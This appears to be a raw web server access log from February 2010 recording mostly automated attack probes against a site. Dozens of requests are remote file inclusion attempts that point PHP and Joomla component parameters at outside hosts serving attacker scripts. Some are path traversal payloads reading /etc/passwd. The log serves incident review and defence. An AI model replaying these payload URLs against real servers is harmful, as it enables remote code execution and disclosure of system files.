89.36.175.10 - - [24/Feb/2010:07:10:51 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.220 - - [24/Feb/2010:07:11:03 -0800] "GET /pictures/p8 HTTP/1.0" 301 76 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
216.119.103.16 - - [24/Feb/2010:07:11:05 -0800] "GET /logs/access_100203.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:11:05 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:11:05 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:11:05 -0800] "GET /logs/access_100218.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.220 - - [24/Feb/2010:07:11:10 -0800] "GET /pictures/p8/ HTTP/1.0" 302 11303 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.220 - - [24/Feb/2010:07:11:20 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:35 -0800] "GET /include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:35 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:35 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:36 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:36 -0800] "GET /include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:11:36 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:07:12:02 -0800] "GET /%20/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:07:12:04 -0800] "GET /%20/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:07:12:11 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:07:12:11 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:07:12:11 -0800] "GET /delete_all.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:13:07 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:13:08 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:13:08 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
65.55.230.18 - - [24/Feb/2010:07:13:55 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.230.18 - - [24/Feb/2010:07:13:56 -0800] "GET /atesh_info/nt.php?t=2611386969 HTTP/1.1" 200 61 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
218.146.255.14 - - [24/Feb/2010:07:14:17 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:14:17 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:14:18 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:14:22 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:15:03 -0800] "GET /logs/access_100208.log/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:07:15:30 -0800] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:07:15:30 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:07:16:12 -0800] "GET /logs/access_100124.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:07:16:15 -0800] "GET /logs/access_100119.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:16:28 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:16:28 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:16:28 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:07:16:35 -0800] "GET /logs/access_100119.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:50 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:50 -0800] "GET /logs/access_100203.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:50 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:52 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:52 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:16:53 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:17:08 -0800] "GET /home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:17:09 -0800] "GET /logs/access_100218.log/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:17:09 -0800] "GET /logs/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:17:13 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:17:13 -0800] "GET /logs/access_100205.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:17:14 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:17:14 -0800] "GET /logs/access_100204.log/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:17:30 -0800] "GET /logs/access_100208.log/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:19:19 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:07:19:43 -0800] "GET /logs/access.log%20%20//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:19:59 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:19:59 -0800] "GET /home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:20:00 -0800] "GET /logs/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [24/Feb/2010:07:20:04 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:07:20:42 -0800] "GET /logs/access_100204.log%20%20/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:07:20:42 -0800] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:07:20:42 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:10 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:10 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:10 -0800] "GET /inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:07:21:23 -0800] "GET /logs/access_100215.log%20%20/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:24 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:24 -0800] "GET /inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:21:24 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:07:21:43 -0800] "GET /logs/access_100217.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:26:13 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:26:13 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:26:45 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:26:45 -0800] "GET /skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:26:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:26:45 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:26:46 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:26:47 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:26:47 -0800] "GET /logs/access_100218.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.206.226.54 - - [24/Feb/2010:07:27:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sawan.or.kr/SESSION/test.pl? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
203.206.226.54 - - [24/Feb/2010:07:27:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sawan.or.kr/SESSION/test.pl? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:07:27:05 -0800] "GET /logs/access_100205.log//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:27:28 -0800] "GET /logs/access_100218.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:27:28 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:27:28 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:07:27:48 -0800] "GET /logs/access.log//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:32:23 -0800] "GET /components/com_virtuemart/install.serverstat.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:32:23 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/install.serverstat.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:07:32:23 -0800] "GET /logs//components/com_virtuemart/install.serverstat.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:33:25 -0800] "GET /logs/access_100208.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:07:34:27 -0800] "GET /%20/pollphp/textfile//admin/common.inc.php?base_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:07:34:29 -0800] "GET /%20/pollphp/textfile//admin/common.inc.php?base_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:35:42 -0800] "GET /write.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:35:42 -0800] "GET /logs//write.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:35:42 -0800] "GET /logs/access_100125.log%20%20//write.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:36:19 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:36:19 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:36:19 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:36:26 -0800] "GET /logs/access_100208.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:36:51 -0800] "GET /logs/access.log%20%20//write.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:37:06 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:07:37:23 -0800] "GET /logs/access_100119.log%20%20//inc/header.php/step_one.php?server_inc=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:37:29 -0800] "GET /logs/access_100210.log%20%20//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:37:53 -0800] "GET /logs/access_100217.log%20%20//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:07:38:23 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:07:38:23 -0800] "GET /logs/access_100208.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:07:38:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:07:38:30 -0800] "GET /logs/access_100123.log//components/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:07:38:30 -0800] "GET /components/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:07:38:30 -0800] "GET /logs//components/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:38:44 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.109 - - [24/Feb/2010:07:38:44 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:39:15 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [24/Feb/2010:07:39:15 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:07:39:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:07:39:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:07:39:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
